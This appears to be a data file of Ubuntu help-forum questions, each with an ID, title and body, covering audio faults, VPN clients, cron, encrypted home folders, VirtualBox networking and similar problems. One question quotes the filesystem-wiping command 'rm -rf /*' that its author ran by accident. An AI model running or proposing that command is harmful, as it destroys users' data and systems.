22886	where to get country flag images for keyboard indicator	as it is explained here i wanted to show current country flag in a keyboard indicator . the problem is where to find those country flags . does anybody know where can i download country flags appropriate for keyboard indicator ? i have found one here but it only has language abbreviations , i need country flags instead . thank you .
22890	input languages switch spontaneously too fast	i am using both arabic and english as input languages and set the switching key combination to alt+shift . sometimes i find the languages keep switching spontaneously too fast that i type a letter in arabic and another in english . no key combination work at this case and the keyboard indicator in the top panel becomes unresponsive . the only solution is to restart . i used 10.10 for a month or two and had no problem until one day i updated my system but the kernel seems not compatible with my laptop and i could n't neither boot nor fix ubuntu so i had to reinstall . the problem started to appear then . i thought it might be my cd has some scratches and missing files i tried to reburn the image several times and even downloading an entirely new image but nothing works i get the same problem . on windows everything is working fine that 's why i am excluding a keyboard problem as i use the same key combination as windows . nb : i can remove arabic and this solves the problem but not usable for me .
22896	how do i print photos ?	other than for windows in ubuntu there are no fancy utilities provided from printer manufacturers to print photos . i am aware of gnome photo printer and of photoprint , the first being easy to handle , the latter having more options . however i wonder if there are any other or maybe even better alternatives ( including plugins ) to perform the following tasks : print photos in the best photo-resolution the driver offers adjust paper size for standard values of photo papers choose paper tray if the printer has more than one print out multiple photos on one page including mixed sizes ( grids ) multiple prints with same settings borderless printing if the printer is capable of this any additional options like pre-processing for color correction or noise reduction would be nice to have but are not so essential . according to this spec it seems not to so easy to accomplish the simple task of printing photos . indeed all applications i have gone through have major drawbacks that make printing photos almost impossible . below i will list what put me off using them for photo printing : for obscure reasons cups only offers printing at 600 dpi the most . gnome photo printer : no thumbnails , no grids , not available for 14.04 photoprint : does not keep settings , gui broken , no standard photo size , no thumbs , not available for 14.04 eye of gnome : no multiple pages , no grids gimp + images grid layout : far too many steps to finally find that prints are always different to their previews . f-spot : no grids picasa 3 via wine : no grids , very few fixed paper sizes , 300 dpi only flphoto : strange gui , no thumbs , no printer settings , did not print at all turboprint : proprietary paid software with a shameless high price and obscure paid-only update policy - but it does the job quite well ( even includes reporting inklevels from a network printer ) for many canon , epson , brother and hp printers . alas , i am not willing to pay $ 40 for a basic feature i expect to just work . windows : ooops - everything works fine ! but i want ubuntu to do this ! after half a pack of ink cartridges and half a pack of photo paper cards i am getting tired of testing . at least gimp and picasa looked promising but both do n't keep their promise when it comes to printing . i 'd already be happy to quickly print a few photos with eog if bug # 80220 was fixed - but it 's still on `` wishlist '' .
22907	how to access ubuntu one server side logs for my account ?	i would like to have info ( time , filename , and user when having shared folders ) about file changes , uploads , downloads ...
22909	repairing after a rm -rf /*	i accidentally ran rm -rf /* on my ubuntu 10.10 and canceled the command quickly then . although i was not sudo but a lot of my files were deleted . the system has become less responsive and i am not sure how to fix it . for instance , i reinstalled firefox and it solved many firefox issues but right click is very sluggish . deluge keeps on pulling up cpu usage ( 1 core ) to 100 % . shutter is also a bit weird in terms of responsiveness . is there anything i could do to repair everything ? like reinstalling every installed package and ubuntu files .
22910	what is the difference between ./ and sh to run a script ?	i have written a simple script . when i runsh < myscriptname.sh > , i got the correct output , but when i run ./ < myscriptname.sh > , i got an error . what is difference between when i do sh and ./ ?
22913	what does the kernel message `cpu0 attaching null sched-domain.` mean ?	question : what does this dmesg mean ? is it bad ? there is a two year old post about how this could imply degraded i/o performance , could this be/is this still true ? ? background : i have been experiencing degraded i/o but i attribute this to using the built in raid on my motherboard as opposed to a dedicated card . i 've been tracking down a few random kernel messages and now i 've switched to my desktop -- more out of curiosity than anything . the box has an intel core i7 930 processor . the following messages appear with some regularity . i 'm running openpbs , if that matters . but these messages appear six times within the past day and a half since the system was rebooted . the output of uname -a is : linux # # # # # # 2.6.32-26-generic # 48-ubuntu smp wed nov 24 10:14:11 utc 2010 x86_64 gnu/linux and the messages from dmesg are : [ 185.609169 ] cpu0 attaching null sched-domain . [ 185.609173 ] cpu1 attaching null sched-domain . [ 185.609175 ] cpu2 attaching null sched-domain . [ 185.609176 ] cpu3 attaching null sched-domain . [ 185.609178 ] cpu4 attaching null sched-domain . [ 185.609179 ] cpu5 attaching null sched-domain . [ 185.609180 ] cpu6 attaching null sched-domain . [ 185.609182 ] cpu7 attaching null sched-domain . [ 185.756764 ] cpu0 attaching sched-domain : [ 185.756766 ] domain 0 : span 0,7 level sibling [ 185.756768 ] groups : 0 ( cpu_power = 589 ) 7 ( cpu_power = 589 ) [ 185.756772 ] domain 1 : span 0-7 level mc [ 185.756773 ] groups : 0,7 ( cpu_power = 1178 ) 1,4 ( cpu_power = 1178 ) 2,5 ( cpu_power = 1178 ) 3,6 ( cpu_power = 1178 ) [ 185.756780 ] cpu1 attaching sched-domain : [ 185.756781 ] domain 0 : span 1,4 level sibling [ 185.756782 ] groups : 1 ( cpu_power = 589 ) 4 ( cpu_power = 589 ) [ 185.756786 ] domain 1 : span 0-7 level mc [ 185.756787 ] groups : 1,4 ( cpu_power = 1178 ) 2,5 ( cpu_power = 1178 ) 3,6 ( cpu_power = 1178 ) 0,7 ( cpu_power = 1178 ) [ 185.756793 ] cpu2 attaching sched-domain : [ 185.756794 ] domain 0 : span 2,5 level sibling [ 185.756795 ] groups : 2 ( cpu_power = 589 ) 5 ( cpu_power = 589 ) [ 185.756799 ] domain 1 : span 0-7 level mc [ 185.756800 ] groups : 2,5 ( cpu_power = 1178 ) 3,6 ( cpu_power = 1178 ) 0,7 ( cpu_power = 1178 ) 1,4 ( cpu_power = 1178 ) [ 185.756806 ] cpu3 attaching sched-domain : [ 185.756807 ] domain 0 : span 3,6 level sibling [ 185.756808 ] groups : 3 ( cpu_power = 589 ) 6 ( cpu_power = 589 ) [ 185.756812 ] domain 1 : span 0-7 level mc [ 185.756813 ] groups : 3,6 ( cpu_power = 1178 ) 0,7 ( cpu_power = 1178 ) 1,4 ( cpu_power = 1178 ) 2,5 ( cpu_power = 1178 ) [ 185.756819 ] cpu4 attaching sched-domain : [ 185.756820 ] domain 0 : span 1,4 level sibling [ 185.756821 ] groups : 4 ( cpu_power = 589 ) 1 ( cpu_power = 589 ) [ 185.756825 ] domain 1 : span 0-7 level mc [ 185.756826 ] groups : 1,4 ( cpu_power = 1178 ) 2,5 ( cpu_power = 1178 ) 3,6 ( cpu_power = 1178 ) 0,7 ( cpu_power = 1178 ) [ 185.756832 ] cpu5 attaching sched-domain : [ 185.756833 ] domain 0 : span 2,5 level sibling [ 185.756834 ] groups : 5 ( cpu_power = 589 ) 2 ( cpu_power = 589 ) [ 185.756838 ] domain 1 : span 0-7 level mc [ 185.756839 ] groups : 2,5 ( cpu_power = 1178 ) 3,6 ( cpu_power = 1178 ) 0,7 ( cpu_power = 1178 ) 1,4 ( cpu_power = 1178 ) [ 185.756845 ] cpu6 attaching sched-domain : [ 185.756846 ] domain 0 : span 3,6 level sibling [ 185.756847 ] groups : 6 ( cpu_power = 589 ) 3 ( cpu_power = 589 ) [ 185.756850 ] domain 1 : span 0-7 level mc [ 185.756852 ] groups : 3,6 ( cpu_power = 1178 ) 0,7 ( cpu_power = 1178 ) 1,4 ( cpu_power = 1178 ) 2,5 ( cpu_power = 1178 ) [ 185.756858 ] cpu7 attaching sched-domain : [ 185.756859 ] domain 0 : span 0,7 level sibling [ 185.756860 ] groups : 7 ( cpu_power = 589 ) 0 ( cpu_power = 589 ) [ 185.756863 ] domain 1 : span 0-7 level mc [ 185.756865 ] groups : 0,7 ( cpu_power = 1178 ) 1,4 ( cpu_power = 1178 ) 2,5 ( cpu_power = 1178 ) 3,6 ( cpu_power = 1178 )
22915	which is the `` safest '' system cleaner in the repository ?	i have a small hard drive ( 20 gb ) so i need to keep an eye on my disk usage analyzer , i ca n't afford to upgrade my hard drive yet so i 'm looking for a safe and effective system cleaner that wo n't compromise system stability ! ?
22918	network access via open file dialog	hallo all , i 'm trying to use easytag to tag my music collection that is shared on a nas in my home network . but my problem is , that i can not access the nas in the open file dialog ( can only access everything on my computer but nothing in the network ) . i had this problem for several times . in some applications , the open-file-dialog supports network storages and in other applications not . is this normal ? is there a possibility , how i 'm able to access the network device in those programms ? greetings
22919	why does sound stop working after a while ?	i do n't know how to reproduce this problem , because i do n't regularly play music or sound . all i know is that , sometimes , i 'll load a video ( from youtube or from a local file ) and there will be no sound . everything looks fine software wise : rebooting always fixes . aplay , paplay and pals give no error message i 'm not in the audio group , as advised the device exists and appears in use : $ lsof /dev/snd/by-path/pci-0000\:00\:1b.0 command pid user fd type device size/off node name pulseaudi 17313 badp 23u chr 116,10 0t0 7628 /dev/snd/by-path/../controlc0 pulseaudi 17313 badp 30u chr 116,10 0t0 7628 /dev/snd/by-path/../controlc0 restarting pulseaudio or alsa seems to do no good . what is wrong here ?
22925	why are email distribution lists in evolution not in sync with contacts ?	email distribution lists in evolution consist of contacts . unfortunately these contacts are not updated when the original contact gets changed , e.g . a name change . in case of multiple occurrences of one contact in several distribution lists you have to update all these occurrences manually . why are these entries only copies of the original contact instead of references to it ?
22927	how to properly orient the cursor for typing in arabic ?	whenever i am typing in arabic , the cursor skips to the beginning of the line because if it were written from left to right , that would be where i last typed . how can i fix that ?
22931	how to use pounds as currency when buying ubuntu one storage ?	i am trying to buy more storage to my ubuntu one account . i live in uk and the purchase form detects that . however , the form allows me to choose between euros and dollars . why is pounds not in the list ? how can i make my purchase in pounds ?
22934	what is proper setup for `` anacron '' ?	i am running ubuntu 9.10 and 10.04 on mediatemple ( ve ) servers . on both of them , the anacron setup is broken , ... and they have been broken since i first installed ubuntu . it has only come to my attention recently , when i realize my log files were not rotating . i am hoping someone who has anacron working can help diagnose the problem and suggest a fix . here is /etc/cron.d/anacron ... this part works correctly : every morning at 7:30am , cron executes this command to start up anacron . # /etc/cron.d/anacron : crontab entries for the anacron package shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin 30 7 * * * root test -x /etc/init.d/anacron & & /etc/init.d/anacron start > /dev/null the problem is that /etc/init.d/anacron start fails : # /etc/init.d/anacron start > /dev/null start : unknown job : anacron notice that /etc/init.d/anacron is a symbolic link to /lib/init/upstart-job : # ls -l /etc/init.d/anacron lrwxrwxrwx 1 root root 21 jan 12 2010 /etc/init.d/anacron - > /lib/init/upstart-job now i am stumped . anyone have any suggestions how to fix this ? take a look in /var/log and see if your log files are being rotated ( as opposed to growing indefinitely ) . if they are being rotated , then you probably have a working anacron , so please check your setup and let me know how it differs from mine . thanks in advance , ...
22935	gtk warning when opening gedit in terminal	previously , i need to clear documents history , so i googled and found this : http : //www.watchingthenet.com/ubuntu-tip-clear-disable-recent-documents.html i did the step , and then when i opened gedit in root terminal , i 've got this : root @ dellph1-desktop : / # gedit ( gedit:8224 ) : glib-critical ** : g_bookmark_file_load_from_data : assertion `length ! = 0 ' failed ( gedit:8224 ) : gtk-warning ** : attempting to store changes into `/root/.recently-used.xbel ' , but failed : failed to rename file '/root/.recently-used.xbel.fp7ppv ' to '/root/.recently-used.xbel ' : g_rename ( ) failed : operation not permitted ( gedit:8224 ) : gtk-warning ** : attempting to set the permissions of `/root/.recently-used.xbel ' , but failed : operation not permitted root @ dellph1-desktop : / # and it 's happpened in user terminal : dellph1 @ dellph1-desktop : ~ $ gedit ( gedit:9408 ) : gtk-critical ** : gtk_accel_label_set_accel_closure : assertion `gtk_accel_group_from_accel_closure ( accel_closure ) ! = null ' failed dellph1 @ dellph1-desktop : ~ $ i really hope someone helps in this case , thank you .
22936	what 's a good tool for creating .epub format e-books ?	i have seen a question here about reading .epub but i would like to create my own easily from a gui , what is available for ubuntu ? even if i have to download something outside the repository , as long as it installs easily and works well , i would also like the software to be able to support the use of .svg images and tables .
22943	how can i recover from a frozen app when connecting over vnc	i have a htpc running 10.10 . it has no keyboard or mouse attached , so i connect over vnc for administration and manual tasks . this usually works fine but every so often an app running in fullscreen mode crashes . all i want to be able to do is kill this app from vnc . is there a keyboard shortcut to do this that will preserve the vnc connection ? if i use ctrl+alt+f1 , i see the terminal but can no longer control it from vnc . trying to return to the desktop does n't work either ? any easy process i can follow ?
22944	bridged network between ubuntu desktop 10.10 host and ubuntu server 10.10 guest	i run ubuntu 10.10 desktop on my machine and have installed ubuntu server 10.10 in a virtualbox vm . i 'm running virtualbox 4.0.2 . it is not virtualbox-ose . i 'd like the guest os to have an ip address on my local network so that i can run server software and access this from the host os . my intention is to run a hudson ci server in the guest os . i understand i need to set up a network bridge for this to work , however i do n't understand what i need to do for this to happen . i have tried following the instructions at https : //help.ubuntu.com/community/virtualbox/networking , however i run into two issues towards the end : '' to take the modifications into account , restart the virtualbox host networking script '' . i do n't have virtualbox-ose installed and guide suggests sudo /etc/init.d/vboxnet restart , however /etc/init.d/vboxnet does not exist for me . the end of the guide refers to the vboxusers group . i do n't have such a group and am not sure why i need this or how it should be created . i 'm simply looking to allow the guest os to have an ip on my local network so that i can access servers on the guest os from the host os . what changes do i need to make to both the host and guest oss for this to work ?
22945	rename selection default was just for the name and now it 's even for the extension	i remember kind of one year ago that when i was renaming a file the default selection was for the name , while the extension where not selected , this way , suppose you have a file.doc , you press f2 , type gongigongi and then enter the result was a file named gongigongi.doc , while now it 's gongigongi . any way to get that feature back ?
22946	how do i install and use the latest version of gnome ?	i followed the instructions for compiling gnome shell and it did compile with a few errors here and there but it did n't run . i installed gnome shell using sudo apt-get install gnome-shell but i got version 2.31.x , while the latest is 2.91.5 or something . so is there a way for me to install the latest build ? is there some repository available for the latest build ?
22949	how to stream audio from windows pc to ubuntu over a network ?	i have a windows pc ( do n't worry , i almost never use it ) that sometimes gets used for playing games and audio/video . is there a way i can stream the audio output from that pc over the network to my ubuntu machine ? both pcs are on the same network , so they can reference themselves directly via their local ip addresses .
22952	how do i run virtualbox on 2.6.38 ?	i tend to run newer kernels than most people , partially for fun , partially for bug testing , partially for masochistic fulfilment . a couple of days ago i installed 2.6.38-rc1 and virtualbox 's dkms module would no longer compile . i 'm not new to virtualbox throwing spanners in my kernel experiments but is there any way to make it compile ?
22961	how to sync folders selectively across computers ?	is it possible to select which folders ( outside the ubuntu one folder ) are being synced to each machine ? for instance i 'd like to sync a data-heavy folder with most of my pc 's but not with my netbook .
22967	how to resolve `` error loading libxml2.so.2 '' when installing cisco anyconnect vpn ?	i 'm trying to install cisco anyconnect vpn client on maverick 64-bit . i 'm getting the following errors : installing cisco anyconnect vpn client ... removing previous installation ... /opt/cisco/vpn/bin/manifesttool : error while loading shared libraries : libxml2.so.2 : can not open shared object file : no such file or directory vpnagentd : no process found extracting installation files to /tmp/vpn.mjh9z5/vpninst086037244.tgz ... unarchiving installation files to /tmp/vpn.mjh9z5 ... starting the vpn agent ... /opt/cisco/vpn/bin/vpnagentd : error while loading shared libraries : libxml2.so.2 : can not open shared object file : no such file or directory i have libxml2.so.2 in /usr/lib , though . should it be somewhere else ? thanks in advance .
22973	share folder with mac guest on a linux ubuntu host	i am trying to share a folder on virtualbox with a guest mac , i tried to share the folder through virtualbox but it does n't show up in mac , also i tried sharing a folder on mac and access it from ubuntu also failed so i need someone who did this before with success to tell me how to correctly do this .
22974	how to get rid of smsusb_onresponse on boot screen ?	i cant get rid of the following messages after the plymouth starts.. smsusb_init_device : line : 384 : smscore_start_device ( ... ) failed [ 27.244635 ] smsusb_onresponse : line : 117 : error , urb status -2 , 0 bytes [ 27.245013 ] smsusb_onresponse : line : 117 : error , urb status -2 , 0 bytes [ 27.245132 ] smsusb_onresponse : line : 117 : error , urb status -2 , 0 bytes [ 27.245262 ] smsusb_onresponse : line : 117 : error , urb status -2 , 0 bytes [ 27.245382 ] smsusb_onresponse : line : 117 : error , urb status -2 , 0 bytes [ 27.245512 ] smsusb_onresponse : line : 117 : error , urb status -2 , 0 bytes [ 27.245631 ] smsusb_onresponse : line : 117 : error , urb status -2 , 0 bytes [ 27.245762 ] smsusb_onresponse : line : 117 : error , urb status -2 , 0 bytes [ 27.245880 ] smsusb_onresponse : line : 117 : error , urb status -2 , 0 bytes [ 27.246011 ] smsusb_onresponse : line : 117 : error , urb status -2 , 0 bytes any idea how to get rid of them ?
22976	is there a way to check logs about user login ?	the login process to my ubuntu box takes a long time , maybe a minute or longer . unlike the bootstrap which prints a lot of messages to the console , there is nothing displayed when gui started . i 've checked /var/log/xorg.0.log and /var/log/xorg.1.log , most of them are a bit of lower level information about display devices , seem like things happened before the login , and nothing related to startup applications . any idea ?
22977	can i connect to my company 's exchange server through kontact ?	running kubuntu 11.04 ( natty ) and am trying to replace outlook . i need access to calendaring and email but have not been able to figure things out . a google of things does n't give me very good information so turning here to ask the gurus . system information : running kubuntu 11.04 and would like to use kontact ( kmail ) to connect to work . also would like to avoid installing gnome if possible . connecting to exchange 2010 and i do n't have access to change anything on the exchange server thanks in advance
22978	encrypted home folder - how to home folder after 10.10 reload ?	i am using ubuntu 10.10 and i set the home folder to be encrypted whenever i installed my system . unfortunately , i forgot i encrypted the home folder and i reinstalled 10.10 . now i ca n't access my old home folder . how can i get my data back ?
22980	vpn connection shortcut	is there a way to create a desktop shortcut to a vpn connection , like in windows ? basically , once clicked , it asks for the login information and connects . thanks in advance .
22981	no sound for dell optiplex gx520	i have fresh installed ubuntu 10.10 ( maverick ) for my desktop pc . the audio is on board and have small speaker inside the cpu . the problem is there has no audio . anyone could help me or any method that could i fix it ? thank you .
22993	why do i have low fps unless root ?	problem : normal users are n't using the best graphics driver . i first noticed this playing osmos from the humblebundle2 , but i can observe it while running glxgears too . maximised on a 1280x1024 , glxgears averages a choppy 60 frames in 5 seconds , vs a smooth 300 frames every 5 seconds for root . here 's some glxinfo : jake @ daedalus : ~ $ glxinfo | grep `` renderer string '' opengl renderer string : software rasterizer jake @ daedalus : ~ $ sudo glxinfo | grep `` renderer string '' [ sudo ] password for jake : opengl renderer string : mesa dri r300 ( rv380 5b60 ) 20090101 x86/mmx+/3dnow ! +/sse2 tcl dri2 i have the same problem even after rebooting ( powering down , cycling surge protector ) . i followed the directions at the ubuntu wiki for getting rid of fglrx , but no dice . what else can i do ? hardware : radeon x300 amd athlon 1.8 ghz 1.5 gb ram
22998	add static arp entries when network is brought up	i have some pretty dumb ip devices on a subnet with my ubuntu server , and the server receives streaming data from each device . i have run into a problem in that when an arp request is issued to the device while it is streaming data to the server , the request is ignored , the cache entry times out and the server stops receiving the stream . so , to prevent the server from sending arp requests to these devices altogether , i would like to add a static arp entry for each , something like arp -i eth2 -s ip.of.the.device mac : of : the : device but these `` static '' arp entries are lost if networking is disabled / enabled or if the server is rebooted . where is the best place to automatically add these entries , preferably somewhere that will re-add them every time the interface eth2 is brought up ? i really do n't want to have to write a script that monitors the output of arp and re-adds the cache entries if they 're missing . edit to add what my final script was : created the file /etc/network/if-up.d/add-my-static-arp with the contents : # ! /bin/sh arp -i eth0 -s 192.168.0.4 00:50 : cc:44:55:55 arp -i eth0 -s 192.168.0.5 00:50 : cc:44:55:56 arp -i eth0 -s 192.168.0.6 00:50 : cc:44:55:57 and then obviously add the permission to allow it to be executed : chmod +x /etc/network/if-up.d/add-my-static-arp and these arp entries will be manually added or re-added every time any network interface is brought up .
23001	jabbler instant messaging implementation with mysql for a lan ?	how to how do i configure a jabber im server on ubuntu and how do i test with users on lan ?
23003	grub boot error	i installed ubuntu , and it runs succesfully , but i ca n't boot the windows 7 . every time i choose windows 7 to run , it returns to the same boot screen menu . may be its because i selected the boot loader partition the same as window 7 loader partition . help me fix it
23009	reasons why crontab does not work	often , crontab scripts are not executed on schedule or as expected . there are numerous reasons for that : wrong crontab notation permissions problem environment variables this community wiki aims to aggregate the top reasons for crontab scripts not being executed as expected . write each reason in a separate answer . please include one reason per answer - details about why it 's not executed - and fix ( es ) for that one reason . please write only cron-specific issues , e.g . commands that execute as expected from the shell but execute erroneously by cron .
23010	unsubscribe ubuntu one folder does n't work	i have two system and a handful of synced folder ( all outside the u1 folder ) . on one system i took a mistake and enabled the download-folder for u1 synchronisation . now at every download a additional upload will start . i 've tried to uncheck the sync checkbox but it does n't work . i 've tried to unsubscribe via u1sdtool but it does n't work . i know it is possible to switch the download folder in my browser . but i would like to have control over my u1-enabled folders ... . ( i am using maverick ... )
23011	why can i ping via ip address but not hostname ?	i have a media/file server running ubuntu 10.10 maverick meerkat , connected via cable directly to a dsl router , which also acts as a network switch . the router uses dhcp to dynamically assign ip addresses . i 'd like to keep it as such , if possible . i have friends come in and it 's easier for them to connect . from my desktop ( ubuntu 10.04 lucid lynx ) i connect via wireless to the router . i can ping the media server and ssh into it using it 's ip , but it fails when i use the hostname . when i ping and ssh wirelessly from my netbook ( crunchbang linux ) , it strangely enough works using the media server 's hostname . that said , i believe it may not be a router configuration issue , but something on my desktop i have to configure . i tried turning off the firewall , on both sides ( sudo ufw enable/disable ) . what else can i check or try ? thanks : - )
23013	online folder ordering different than my pc ?	the folders are shown online ( by web browser ) sorted by capital letter first then by lower case . this is not the case with nautilus 2.30.1 . for example ; online : apple frog mat bean cool dog nautilus : apple bean cool dog cool frog mat this makes it difficult to cross reference .
23014	windows vista disappeared after installing ubuntu10.10 ?	i had windows vista ultimate sp2 160 gb hdd , 1gb ram , intel dual core one of my friend told that ubuntu is also a better os and is an open source programme and u can use alternately both ubuntu or vista , so i downloaded the disk image for ubuntu 10.10 and burned it on a cd . i played it first on windows vista so it asked some 3 options of that i chose an option which downloaded ubuntu cd helper , then i selected the first option something 'demo and install ' it said to reboot the computer i reboooted it by selecting option reboot now and finishing it , after the computer was restarted.it asked me options for selecting ubuntu or windows vista , i selected ubuntu , i saw ubuntu is started which was the least time i could see a new os is started , then i tought i should install it . after selecting install it , there came an option to drag option window 's vertical line to right or left to increase or decrease the partition for ubuntu and on another side where something 'ntfs ' was written i thought it must be for windows i dragged ubuntu to maximum ( 5.23gb ) left 37.3 gb for ntfs dev and i continued forward , left it for some process going on , the ubuntu was installed i think , it also asked for some softwares to be installed i let them be installed and let all process finish after looking some features of ubuntu . i wanted to go back to windows vista but when i restarted computer it did n't asked me an option for selecting os 'ubuntu ' or 'vista ' as it had asked me before . it directly started ubuntu and asked for same options of software to installed , i removed the cd and tried again but still i could n't see anything for vista , when i checked properties of 'file system ' it was written that 2.3 gb is covered and rest 157 gb is free , i am scared that i have deleted all the data of vista and vista os too , can i get my vista back ? , it is ok if i do n't get anything of ubuntu , i had many of important files too in my vista.is really my pc been formatted completely , ? from last week i am searching for its solution on internet i am frustrated a lot , many of the contain particular solution but for before versions of ubuntu , i just want my vista and vista files back .one of the solutions also contained inserting dvd of vista and some procedure but my dvd player is n't working but cd player is working.i hope some of my internet friends come to me as a saviour please . and one note i do n't know what is grub or all other stuffs as i am knowing very bit of installing os .
23018	revert audio configuration to defaults	i messed up the audio on my 10.10 installation . i had a problem of having no sound when plugging in the headphones and following many different solutions for that problem i ( de ) installed several packages . now i have no sound at all . i do n't want a solution on how to fix my headphone problem . i just want to reset all audio-related setting and packages to the after-installation state ( where at least the speakers were working ) . i found several places where it is said that there is no global reset-to-after-installation possibility . or that on could use apt-get clean , but even if this would remove all non-standard audio-packages , i do n't know which packages i would have to install in order to get the standard audio-packages .
23024	xfce shortcut problem	every time , when i hit k button in a terminal window in vim , so it happens fairly often , it invokes the find pop-up . i could not find where this can be turned off . i do not have this problem at home where i also run 10.10 .
23026	weird glitches in inkscape rulers	i have a weird glitch when working with inkscape . the little arrows in the rulers that show current cursor position remain there , not being erased . so i end with the ruler full of them , or just with a thick black line . this , obviously , renders this feature useless , as i ca n't tell the real position of the cursor . here goes an example : is there any way to fix this ? is it a video card driver problem or is it an inkscape bug ?
23028	can i safely add secure login to a bootable usb created from a live cd	i created a persistent usb installation from a 10.10 live cd using the `` boot multiple iso '' utility and their `` pdl casper-rw '' creator . i really like it , have made several changes to the install , and now find myself using it on the go more than i expected to . i would like to add a password and force login to the default user to add a little security . is there anything unique or special about the live-cd environment that would prevent this or make it difficult . if not what is the easiest way to do it so as not to miss something and break my stick ?
23033	mounted drives appearing twice in lists	i have mounted a couple of network shares with my etc/fstab file - it works great , just like it 's supposed to , but unfortunately every mounted drive keeps appearing twice ! when clicking one of the duplicates , an error is shown ; unable to mount : [ mountname ] . mount : according to mtab , [ mount address ] , is already mounted on [ local mountpoint ] . mount failed . here 's how each mountpoint looks in my etc/fstab : //192.168.1.2/backups /media/backups cifs defaults , user=myusername , pass=mypassword , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0 what can i do to make sure that my mounted drives only are listed once ?
23036	microphone not working at all in skype	i have been able to get the built-in microphone ( it 's an acer laptop ) to not only work , but work perfectly in ubuntu 's own sound recorder , but when starting up skype , there 's no sign of my microphone at all . i 've reinstalled skype , checked alsamixer and tried various settings .
23038	dvd-rw disc not recongnized	initially there was data on the disc and ubuntu recognized it . i then blanked the disc ( right click then blank disc ) and now ubuntu does not recognize it anymore . : ( how can i resolve this ?
23039	set default mode in gcalctool	i often use gcalctool , to quickly convert a number between `` binary/hex/decimal '' . for this i find the `` programming '' mode of gcalctool useful . i can select this using `` mode â programming '' from the toolbar . however , this gcalctool setting does not appear to be preserved between restarting gcalctool . is there a way i can force this ? e.g entering something in ~/.gcalctoolrc
23040	how to give a password to ubuntu user , which password recommendation does not pass ?	when you install ubuntu you can input password for user account which even if are weak or un-recommended are allowed . but when from the command prompt if you type passwd it gives ratings on strength and does not allow the passwords to be set . does anyone know of any force option . man passwd does not tell about any option like that . if would like to a single digit password . how do i do that .
23045	how to list currently not installed packages ?	i 'd like to output a list of all currently not installed packages ( they are visible in synaptic for example ) using only shell commands . how do i do this ? thanks !
23053	resizable screen mode for virtualbox behaves strange with ubuntu as guest	i have ubuntu both as guest and as host . i use virtualbox 4 , just downloaded from the official repository . after installing the guest extensions , i got this strange problem : when i activate the resizable screen mode with host + c , the gnome desktop wo n't resize with the screen . only the wallpaper gets stretched . i use no desktop effects and have n't changed any driver options yet . any ideas how to fix this ? here is a screenshot of the guest machine , demonstrating how it looks like after changing the resolution : i know how to use scalable mode , but i guess i forgot some configuration in the guest machine to make it work .
23057	i would like to create a log of all commands typed in terminal	i would like to have a log of all command that are typed on the terminal . i have check `` script '' but this generates a file with the commands and the responds all together . is there a way to have the commands only ?
23062	comprehensive book on kile	finally , i have decided to migrate from office to latex . that is why i have chosen kile as an editor , for many reasons . that 's why i need a comprehensive book or would be even perfect if there is a video training course on kile . the reason is that i have never worked with it before . could you help me to choose a good starting point on learning kile , please ? thank you .
23067	how do you resize a live partition ?	i saw the question : is it possible ( aka safe ) to resize a partition while the system is running ? short answer : yes , but they do n't explain how . how do i resize my partition while the system is running . gparted does n't offer me other option that mouting the partition . thanks
23068	how should i display units in my application ?	there is inconsistency in how various operating systems display file size units . windows shows base 2 , macosx shows base 10 . does ubuntu have guidelines for this ?
23070	google talk plugin in gmail on macbook 2,1	i 'd like to use the chat section in gmail to make phone calls . i 've downloaded and installed the google talk plugin , and it acts like it knows what it 's doing . but when i try to make calls , the internal laptop mic does n't work at all ( i.e. , no one on the other end can hear me ) . in the gmail chat settings , i 've tried selecting `` default device '' for the microphone , as well as `` internal audio analog stereo . '' no matter which setting i try , none seem to work . as i said at the top , this is only a problem in ubuntu ; it works just fine in osx and windows ( which means that yes , my google voice account is properly configured ) . here are my tech specs : ubuntu 10.10 kernel linux 2.6.35-24-generic gnome 2.32.0 google chrome 8.0.552.237 google talk plugin ( google-talkplugin ) 1.8.0.0-1 macbook ( 2,1 ) w/ internal microphone any help will be greatly appreciated ! thanks !
23074	what means this error message : lsof : warning : ca n't stat ( ) fuse.gvfs-fuse-daemon file system /home/nes/.gvfs	when i use lsof with sudo like this sudo lsof ~ lsof : warning : ca n't stat ( ) fuse.gvfs-fuse-daemon file system /home/nes/.gvfs output information may be incomplete . however when i use it without sudo , i do n't get this error . what means this message ?
23075	shortcut for resolution change using nvidia	back several ubuntu versions ago i could resize the screen using ctrl + alt + - ( for higher resolution ) or ctrl + alt + + ( for lower resolution ) . now they do not seem to work . how can i add them again for resolution change .
23078	is there any way of changing the font size of the tabs in chromium ?	is the a way of changing the font size of the tabs in chromium ? chromium 8.0.552.237 ( 70801 )
23079	setup print server using cups ?	i have recently acquired an old dell dimenion 2400 which i hope to use as a print server . my goal is to hook it up to an old hp inkjet printer and be able to print anywhere in the house via ip . what would be the best method for accomplishing this goal ?
23082	home folder not being decrypted	i had an issue with .iceauthority which i think i just managed to solve . but for some reason the system is not able to decrypt my home folder . when i run ecryptfs-mount-private i get the message `` you do not own that encrypted directory '' . how do i fix this ? i read that it should have something to do with .ecryptfs , so i did a chown alpha : alpha .ecryptfs . ~/.ecryptfs $ ls -la total 20 drwx -- -- -- 2 alpha alpha 4096 2010-06-27 10:02 . drwxr-xr-x 4 alpha alpha 4096 2010-08-22 18:46 .. -rw-r -- r -- 1 alpha alpha 0 2010-08-22 18:46 auto-mount -rw-r -- r -- 1 alpha alpha 0 2010-08-22 18:46 auto-umount -rw -- -- -- - 1 alpha alpha 12 2010-08-22 18:46 private.mnt -rw -- -- -- - 1 alpha alpha 34 2010-08-22 18:46 private.sig -rw -- -- -- - 1 alpha root 48 2010-08-22 18:46 wrapped-passphrase -rw-r -- r -- 1 alpha alpha 0 2010-08-22 19:07 .wrapped-passphrase.recorded should i perhaps do a chown alpha : alpha on wrapped-passphrase too ? more on my problem with .iceauthority : yesterday i installed veetle ( but it never worked ) and today when i started my computer the desktop never `` loaded '' . i got the standard messages saying that .iceauthority could not be updated , nautilus could not be started and 'there is a problem with the configuration server . ( /usr/lib/libgconf2-4/gconf-sanity-check-2 exited with status 256 ) ' [ this was copied from internet , i do not know if the versions and status number make up but it was at least an error message involving gconf-sanity-check-2 ] . so i found that people had gotten the same problem when installing veetle so i assumed veetle was the cause of the problem . what i did was to remove vlc ( because this should fix the issue , according to different threads ) . when removing vlc i got an `` .iceauthority '' file ( it was not there earlier ) but still no desktop . this apparently was because of some permission issues so i ran chown alpha : alpha /home/alpha which made the trick - and here i am . hth edit : i did actually a bit more than that , but it was mostly changing 